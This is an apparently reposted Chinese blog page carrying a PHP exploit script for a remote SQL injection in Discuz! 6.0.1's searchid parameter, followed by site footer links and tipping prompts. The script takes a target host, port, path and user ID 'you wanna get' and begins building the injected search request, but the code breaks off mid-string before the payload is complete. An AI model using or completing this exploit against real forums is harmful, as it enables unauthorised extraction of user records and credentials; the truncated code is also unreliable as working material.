Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit


本文整理自网络,侵删。

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22

更多关于Discuz论坛内容来自木庄网络博客


标签:Discuz论坛

相关阅读 >>

php中散列密码的安全性分析

discuz 完美集成进现有系统(整合用户和版面增删)

php实现模拟登陆方正教务系统抓取课表

发布一个基于tokyotyrant的c#客户端开源项目

js实现改进的仿蓝色论坛导航菜单效果代码

discuz! 应用中心操作指南(图文教程)

discuz!软件环境配置技巧

如何设置discuz!7.0分类信息功能

discuz! x2去除forum.php尾巴的方法小结

帝国cms整合discuz的多种方法详细介绍

更多相关阅读请进入《Discuz论坛》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...